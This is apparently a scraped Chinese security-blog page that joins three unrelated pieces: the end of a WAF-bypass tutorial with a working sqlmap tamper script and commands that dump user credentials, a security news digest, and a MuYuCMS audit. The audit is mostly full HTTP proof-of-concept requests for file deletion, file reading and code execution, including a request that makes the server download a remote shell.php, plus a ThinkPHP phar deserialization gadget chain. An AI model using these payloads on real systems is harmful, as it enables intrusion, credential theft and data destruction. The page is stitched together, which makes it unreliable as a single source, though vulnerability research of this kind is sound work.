https://web.archive.org/web/20130614183121/http://lukasz.pilorz.net/testy/unicode_conversion/       * https://web.archive.org/web/20131121094431/sla.ckers.org/forum/read.php?13,11562,11850       * https://web.archive.org/web/20070624194958/http://lukasz.pilorz.net/testy/full_width_utf/index.phps   >>> tamper("1 AND '1'='1")   '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'   """    return payload.replace('\'', "%EF%BC%87") if payload else payload 可见Tamper脚本的结构非常简单,其实渗透测试中的主要难点还是如何去绕过WAF。 下面我们针对bypass部分的绕过方法进行编写Tamper脚本,来实现自动化SQL注入: 实际测试的时候发现,sqlmap默认语句中的AS关键字也会被拦截,这里也用同样的方法替换一下就好 #!/usr/bin/env python import re from lib.core.settings import UNICODE_ENCODING from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL def dependencies():    pass def tamper(payload, **kwargs):    if payload:        payload = payload.replace(" ","/*/!%!/*/")        payload = payload.replace("()","(/*/!%!/*/)")        payload = re.sub(r"(?i)(INFORMATION_SCHEMA.SCHEMATA)",r"/*!00000--%20/*%/%0aINFORMATION_SCHEMA.SCHEMATA*/",payload)        payload = re.sub(r"(?i)(INFORMATION_SCHEMA.TABLES)",r"/*!00000--%20/*%/%0aINFORMATION_SCHEMA.TABLES*/",payload)        payload = re.sub(r"(?i)(INFORMATION_SCHEMA.COLUMNS)",r"/*!00000--%20/*%/%0aINFORMATION_SCHEMA.COLUMNS*/",payload)        payload = re.sub(r"(?i)(/AS/)",r"//*!00000--%20/*%/%0aAS*//",payload)            return payload 测试: sqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent sqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent --dbssqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent python2 sqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent -D security -T users --columns sqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent -D security -T users -C username,password --dump --stop 3
网络安全日报 2023年02月22日
1、研究人员发现一种名为Stealc的新型信息窃取程序 https://securityaffairs.com/142516/malware/stealc-advanced-infostealer.html 2023年1月,SEKOIA.IO的研究人员发现了一种名为Stealc的新型信息窃取程序,该程序在暗网论坛上广为宣传。据称,Stealc的开发依赖于Vidar、Raccoon、Mars和Redline窃取程序。2月,专家们发现了数十个Stealc样本,它们与Vidar和Raccoon有相似之处。Stealc能够从流行的网络浏览器、加密货币钱包的浏览器扩展、桌面加密货币钱包以及其他应用程序(如电子邮件客户端)中窃取敏感数据。 2、LVHN声称遭到BlackCat勒索软件组织的攻击 https://www.mcall.com/2023/02/20/lehigh-valley-health-network-reports-cyberattack-from-suspected-russian-ransomware-group/ Lehigh Valley Health Network官员周一宣布,他们已遭到与俄罗斯有关的BlackCat组织的攻击。LVHN总裁兼首席执行官Brian A. Nester表示,截至周一,此次攻击还没有影响到LVHN的运营。根据其初步分析,攻击针对的是位于美国拉克瓦纳县的一家医生诊所的网络。LVHN于2月6日在该网络的IT系统中检测到未经授权的活 3、Outlook邮件过滤器损坏导致收件箱收到垃圾邮件 https://www.bleepingcomputer.com/news/microsoft/microsoft-outlook-flooded-with-spam-due-to-broken-email-filters/ 根据越来越多的微软客户的报告,在过去的十几个小时里,Outlook收件箱中充斥着垃圾邮件,因为垃圾邮件过滤器目前已被破坏。无数Outlook用户证实了这一持续存在的问题,他们在社交媒体上表示,所有邮件都在收件箱中,甚至是那些以前被标记为垃圾邮件并发送到垃圾文件夹的邮件。有用户称,即使在垃圾邮件过滤器中选中“只信任来自我的安全发件人和域名列表以及安全邮件列表中的电子邮件” 4、Aviacode公司遭到勒索软件攻击泄露200GB文件 https://www.databreaches.net/aviacode-remains-silent-after-0mega-dumps-200-gb-of-their-files/ 1月9日,DataBreaches注意到Aviacode已添加到0mega的泄漏站点。Aviacode公司主要提供一个基于SaaS的工作流平台,包含医疗企业编程的各个环节。0mega勒索软件组织于2月11日转储了超过200 GB的Aviacode文件。研究人员在泄露的数据中发现了有关员工和承包商的数据,包含员工、工资单、税务信息和用户数据。其他与员工相关的文件包括员工的工资信息、职位、证书、雇用日期,在少数 5、 Fortinet FortiNAC 严重漏洞CVE-2022-39952 PoC发布 https://securityaffairs.com/142553/hacking/poc-exploit-code-fortinet-fortinac.html Horizon3 网络安全公司的研究人员发布了针对 Fortinet 的 FortiNAC 网络访问控制解决方案中严重漏洞的PoC,该漏洞被跟踪为CVE-2022-39952 。上周,Fortinet 发布了安全更新,以解决 FortiNAC 和 FortiWeb 解决方案中的两个关键漏洞。这两个漏洞被追踪为 CVE-2022-39952 和 CVE-2021-42756,分别是Fortinet FortiNAC中文件名或路径的 6、Resecurity 警告针对全球数据中心的恶意网络活动有所增加 https://securityaffairs.com/142531/hacking/attacks-data-center-service-providers.html Resecurity 警告针对全球数据中心服务提供商的恶意网络活动有所增加。 7、VMware 修复了严重的 Carbon Black 应用程序控制漏洞 https://www.securityweek.com/vmware-plugs-critical-carbon-black-app-control-flaw/ VMware 周二推出了一项重大安全修复程序,以弥补其面向企业的 Carbon Black App Control 产品中的一个关键漏洞。来自 VMware 的严重严重性建议将漏洞跟踪为 CVE-2023-20858,并警告说黑客可以启动注入攻击以获得对底层服务器操作系统的完全访问权限。 8、抗量子密码学算法CRYSTALS-Kyber已被 AI 结合侧信道攻击破解 https://www.securityweek.com/ai-helps-crack-a-nist-recommended-post-quantum-encryption-algorithm/ NIST 于 2022 年 7 月推荐的用于后量子密码学的CRYSTALS -Kyber公钥加密和密钥封装机制已被破解。瑞典斯德哥尔摩 KTH 皇家理工学院的研究人员使用递归训练 AI 结合侧信道攻击。 9、MyloBot 僵尸网络在全球迅速蔓延,每天感染超过 50,000 台设备 https://thehackernews.com/2023/02/mylobot-botnet-spreading-rapidly.html 一个名为 MyloBot 的复杂僵尸网络已经破坏了数千个系统,其中大部分位于印度、美国、印度尼西亚和伊朗。 10、联合国发布《隐私增强技术指南》概述 https://www.secrss.com/articles/52113 2023年2月13日,联合国大数据和数据科学专家委员(UNCEBD)会发布《隐私增强技术指南》(The PET Guide)。指南重点关注隐私增强技术在官方统计数据中的应用,旨在帮助各国的国家统计局更好地理解和运用隐私增强技术处理敏感数据,提升数据的准确性和安全性,进而助力政府科学合理决策。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
木鱼cms系统审计小结
MuYuCMS基于Thinkphp开发的一套轻量级开源内容管理系统,专注为公司企业、个人站长提供快速建站提供解决方案。   ‍ 环境搭建 我们利用 phpstudy 来搭建环境,选择 Apache2.4.39 + MySQL5.7.26+ php5.6.9 ,同时利用 PhpStorm 来实现对项目的调试    漏洞复现分析 ‍ 任意文件删除 我们在网站的根目录下创建一个文件 test.txt 用来校验文件是否被删除 任意文件删除一 漏洞复现 登录后台后构造数据包 POST /admin.php/accessory/filesdel.html HTTP/1.1 Host: test.test Content-Length: 55 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://test.test Referer: http://test.test/admin.php/accessory/filelist.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: muyu_checkaccre=1676530347; PHPSESSID=ae5mpn24ivb25od6st8sdoouf7; muyu_first=1676531718;XDEBUG_SESSION=PHPSTORM Connection: close filedelur=/upload/files/.gitignore/../../../../test.txt 文件被成功删除 漏洞分析 \app\admin\controller\Accessory::filesdel 通过参数 $filedelurl 拼接得到要删除文件的地址,利用 unlink 函数删除文件,中间没有做任何校验 任意文件删除二 漏洞复现 登录后台后构造数据包 POST /admin.php/accessory/picdel.html HTTP/1.1 Host: test.test Content-Length: 54 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://test.test Referer: http://test.test/admin.php/accessory/filelist.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: muyu_checkaccre=1676530347; PHPSESSID=ae5mpn24ivb25od6st8sdoouf7; muyu_first=1676531718;XDEBUG_SESSION=PHPSTORM Connection: close picdelur=/upload/files/.gitignore/../../../../test.txt 漏洞分析 \app\admin\controller\Accessory::picdel 通过参数 $picdelur 拼接得到要删除图片的地址,利用 unlink 函数删除文件,中间没有做任何校验 任意文件删除三 漏洞复现 登录后台后构造数据包 GET /editor/index.php?a=delete_node&type=file&path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/1.1 Host: test.test Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://test.test User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close 漏洞分析 \App\Controller\Controller::delete_node \App\Core\File::deleteFile \App\Controller\Controller::beforeFun 对传入的 path 判断了是否在合法的文件域中,但没有对传入的 path 没有进行跨目录的校验就删除了文件 任意文件删除四 漏洞复现 POST /admin.php/database/sqldel.html HTTP/1.1 Host: test.test Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://test.test User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 19 name=../../test.txt 漏洞分析 \app\admin\controller\Database::sqldel 获取 post 传入的参数 name 利用 delFile 函数删除文件 任意文件删除五 漏洞复现 登录后台后构造数据包 POST /admin.php/update/rmdirr.html?dirname=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/1.1 Host: test.test Content-Length: 0 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 X-Requested-With: XMLHttpRequest Origin: http://test.test Referer: http://test.test/admin.php/system/update.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=d3bt6cnt59c2dfq7pshva5ffc1; muyu_checkaccre=1676878715; muyu_first=1676879341 Connection: close 漏洞分析 \app\admin\controller\Update::rmdirr 传入的参数 $dirname 经过简单的判断,然后调用 unlink 函数去删除 任意文件读取 漏洞复现 登录后构造数据包 GET /editor/index.php?a=get_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/1.1 Host: test.test Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://test.test User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close 成功读取文件信息 漏洞分析 \App\Controller\Controller::get_file 列目录 漏洞复现 登录后构造数据包 GET /editor/index.php?a=dir_list&dir_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../../../../../../../../ HTTP/1.1 Host: test.test Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://test.test User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close 成功将根目录下的信息显露出来 漏洞分析 \App\Controller\Controller::dir_list \App\Core\Jstree::getDir \App\Controller\Controller::beforeFun 对传入的 dir_path判断了是否在合法的文件域中,但没有对传入的 dir_path没有进行跨目录的校验就打印出目录信息 任意代码执行 任意代码执行一 漏洞复现 登录后构造数据包,读取config 文件内容 GET /editor/index.php?a=get_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/member_temp/user/config.php HTTP/1.1 Host: test.test Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://test.test User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close 此时需要获取的并不是文件内容,而是更改之后文件的key 复制文件校验码 替换到下面数据包中 GET /editor/index.php?a=save_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/member_temp/user/config.php&file_key=5e9c862ce52986e5437652d707c7c82f&file_content=<?php+phpinfo();+php?> HTTP/1.1 Host: test.test Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://test.test User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close 访问文件在网站上对应的位置,发现代码已经被成功执行 也可以执行其他代码 漏洞分析 \App\Controller\Controller::save_file save_file 有保存文件的操作,但是需要获取到文件的校验码。所以就可以通过先查询文件的相关信息,然后再对文件进行修改 \App\Core\File::setFileContent 任意代码执行二 漏洞复现 登录后构造数据包 POST /admin.php/update/getFile.html?url=http://127.0.0.1:8000/shell.php&save_dir=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/ HTTP/1.1 Host: test.test Content-Length: 0 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 X-Requested-With: XMLHttpRequest Origin: http://test.test Referer: http://test.test/admin.php/system/update.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=d3bt6cnt59c2dfq7pshva5ffc1; muyu_checkaccre=1676878715; muyu_first=1676879341;XDEBUG_SESSION=PHPSTORM Connection: close 指定远程 url 下载文件,下载的文件保存到指定位置 访问指定的文件目录,发现代码被成功执行 漏洞分析 \app\admin\controller\Update::getFile 通过 $url 指定获取远程文件的地址,$save_dir 指定保存文件的路径,并未对文件的内容和类型进行校验,所以就会产生代码执行漏洞 ‍ phar反序列化 漏洞复现 <?php namespace think{    abstract class Model{        protected $append;        private $data;        function __construct(){            $this->append = ["aaaa"=>["123456"]];            $this->data = ["aaaa"=>new Request()];       }   }    class Request   {        protected $param;        protected $hook;        protected $filter;        protected $config;        function __construct(){            $this->filter = "system";            $this->config = ["var_ajax"=>''];            $this->hook = ["visible"=>[$this,"isAjax"]];            $this->param = ["calc"];       }   } } namespace think\process\pipes{    use think\model\Pivot;    class Windows   {        private $files;        public function __construct()       {            $this->files=[new Pivot()];       }   } } namespace think\model{    use think\Model;    class Pivot extends Model   {   } } namespace{    use think\process\pipes\Windows;    @unlink('shell.jpg');    $phar = new Phar("shell.phar"); //    $phar->startBuffering();    $phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');    $object = new Windows();    //$object ->haha= 'eval(@$_POST[\'a\']);';    // $object ->haha= 'phpinfo();';    $phar->setMetadata($object);    $phar->addFromString("a", "a"); //添加要压缩的文件      $phar->stopBuffering();      echo (base64_encode(serialize(new Windows()))); } ?> 生成 phar 序列化数据包 修改后缀,启动 python 服务器 构造数据包下载远程的文件到本地 GET /public/static/admin/static/ueditor/php/controller.php?action=catchimage&source[]=http://127.0.0.1:8000/shell.png HTTP/1.1 Host: test.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: XDEBUG_SESSION=PHPSTORM Connection: close 执行 phar 序列化 http://test.test/admin.php/update/rmdirr.html?dirname=phar://./public/upload/images/1676882763141961.png   ‍ 注意事项 在最开始,获取远程图片的时候,一直出现错误 提示 链接contentType不正确 通过在代码中查找,定位到问题位置 校验了 Content-Type 的值 经过不断的调试仍然发现不了问题出现在哪 但是发现通过 phpstudy 默认的 apache 服务是没问题的 通过抓包对比发现 一个是 Content-Type 另一个是 Content-type 我直接修改了 python 的源代码 将其中的小写 t 替换成了大写 T ‍ 漏洞分析 \app\admin\controller\Update::rmdirr 通过协议绕过了对文件名的检测然后触发了反序列漏洞 MuYuCMS-master/public/static/admin/static/ueditor/php/controller.php
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页